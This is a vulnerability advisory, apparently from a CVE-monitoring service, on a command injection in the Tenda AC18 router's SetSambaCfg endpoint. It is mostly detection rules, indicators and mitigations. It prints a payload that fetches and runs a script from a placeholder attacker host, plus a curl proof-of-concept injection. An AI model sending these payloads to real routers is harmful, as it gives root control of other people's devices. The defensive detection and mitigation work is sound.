On April 27, 2026, a new CVE rated CVSS 9.8 was published against the Tenda AC18 router on firmware V15.03.05.05_multi. Located in the /goform/SetSambaCfg endpoint, the vulnerability lets an unauthenticated attacker execute arbitrary commands by injecting shell into the guestuser parameter. With the AC18 sold by the millions to consumers and small businesses, this flaw poses an immediate internet-scale risk.
Technical Details
The /goform/SetSambaCfg endpoint handles configuration for the router's built-in Samba server, used to share files from a USB stick. The guestuser parameter (Samba guest username) is concatenated directly into a shell command — typically a call to useradd or smbpasswd — with zero sanitization.
An attacker injects a shell payload into guestuser:
guestuser=guest;wget http://attacker/p.sh|sh;
The backend binary then runs the legitimate command followed by the payload, yielding the attacker a remote shell on the router as root.
Characteristics
| Field | Value |
|---|---|
| CVSS 3.1 | 9.8 (CRITICAL) |
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-78 (OS Command Injection) |
| Authentication | None |
| Public exploit | Yes (PoC released) |
| Privileges obtained | root |
Affected Products and Versions
| Product | Firmware | Status |
|---|---|---|
| Tenda AC18 | V15.03.05.05_multi | ❌ Vulnerable |
As of writing, Tenda has not released a fixed firmware. Check the product support page and your fleet's CVE inventory regularly.
Exploitation and Impact
Attack vector
If the router admin interface is reachable from the internet — common when end users enable remote access — exploitation is trivial via a single HTTP POST request.
Post-compromise impact
- Full persistence: add root users, modify firmware
- LAN pivot: access every device behind the router (IP cameras, NAS, user endpoints)
- Botnet recruitment: Mirai and its variants actively target Tenda routers
- Credential theft: sniff internal traffic, DNS hijack for phishing
- Crypto-mining: leverage router resources to mine
Public PoC
```bash
curl -X POST "http://<router-ip>/goform/SetSambaCfg" \
-d "guestuser=user;id>/tmp/pwn;"
```
No account needed. Any IP that can reach the admin interface compromises the router in under a second.
Detection and IOCs
On the network (upstream firewall, IDS)
```
# Suricata (sticky-buffer syntax; Snort 3 uses http_uri / http_client_body instead) — detect shell payload on SetSambaCfg
# '&' is kept out of the character class: it is the form-field separator, so matching it would fire on every
# legitimate request that sends another parameter after guestuser. The body is matched as sent, so a
# percent-encoded separator (e.g. %3B for ';') is not caught by this rule alone.
alert http any any -> any any (msg:"Tenda AC18 SetSambaCfg command injection"; \
flow:to_server,established; http.uri; content:"/goform/SetSambaCfg"; \
http.request_body; pcre:"/guestuser=[^&]*[;|`]/"; sid:2026031255; rev:1;)
```
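The same check applied to logged requests, as an added example that is not part of the original advisory or of Tenda's code. It percent-decodes the form body before inspecting guestuser, so an encoded separator such as %3B is flagged as well as a raw one; the sample requests and the parameter name sambaEn are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/goform/SetSambaCfg"

# Characters that have no business in a Samba guest username but let a value
# break out of a shell command: separators, pipes, backticks, $(), redirects.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r]")


def parse_form_body(body: str) -> dict:
    """Split an x-www-form-urlencoded body on '&' only, then percent-decode
    each key and value. Decoding after the split keeps an encoded separator
    such as %3B inside the value, where it is inspected."""
    params: dict = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def is_setsambacfg_injection(method: str, path: str, body: str) -> bool:
    """True when a POST to SetSambaCfg carries shell metacharacters in guestuser."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return False
    values = parse_form_body(body).get("guestuser", [])
    return any(SHELL_META.search(v) is not None for v in values)


# Constructed sample requests (method, path, body), not captured traffic.
SAMPLE_REQUESTS = [
    ("POST", TARGET_PATH, "guestuser=user;id>/tmp/pwn;"),    # raw payload, as in the PoC
    ("POST", TARGET_PATH, "guestuser=guest%3Bid"),           # ';' percent-encoded as %3B
    ("POST", TARGET_PATH, "guestuser=guest&sambaEn=1"),      # benign; 'sambaEn' is a made-up name
    ("POST", TARGET_PATH, "guestuser=guest+user"),           # benign; '+' decodes to a space
    ("GET", TARGET_PATH, ""),                                # not a POST
    ("POST", "/goform/ExampleOtherCfg", "a=1;b"),            # hypothetical endpoint, out of scope
]


def flag_injections(requests):
    """Return the indices of the requests the detection logic matches."""
    return [i for i, (m, p, b) in enumerate(requests) if is_setsambacfg_injection(m, p, b)]


if __name__ == "__main__":
    for i in flag_injections(SAMPLE_REQUESTS):
        print("ALERT", SAMPLE_REQUESTS[i])
```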
On the router (with console access)
- Inspect `ps`, `crontab`, `iptables` for unexpected entries
- Examine `/tmp/`, `/var/log/messages`, `/dev/shm`
- Check Samba accounts via `pdbedit -L`
Network indicators
- Outbound connections to C2 servers (Mirai typically uses IRC or custom TCP)
- Abnormal DNS traffic (suspicious domain lookups)
- POST requests to `/goform/SetSambaCfg` from unknown external IPs
Mitigation
Priority action
- Disable remote admin access from the internet
- Disable Samba if you don't use file sharing: Settings → USB Application → Samba → Disable
- Restrict LAN access to the admin panel to a single management IP
Temporary workaround
If you operate an upstream firewall, block any POST request containing shell separators to /goform/SetSambaCfg. If you have no upstream firewall but another router available, place the AC18 behind it as a simple AP (no NAT/firewall) and route through the upstream router.
Long-term solution
- Replace the device if Tenda doesn't release a patch in the weeks following disclosure
- Migrate to OpenWrt on supported models (check the OpenWrt support matrix before purchase)
Why Continuous Monitoring Matters
Consumer and SMB routers are a prime entry point for attackers: exposed to the internet, rarely patched, with short support cycles. Maintaining a current inventory with automatic alerts is the only way to catch a CVE like CVE-2026-31255 in time and prevent an end-of-life device from becoming the weak link.
With cveo.tech, inventory your routers and network gear and get automatic email alerts when a critical CVE targets one of your versions — so you can decide on patching or replacement before attackers do.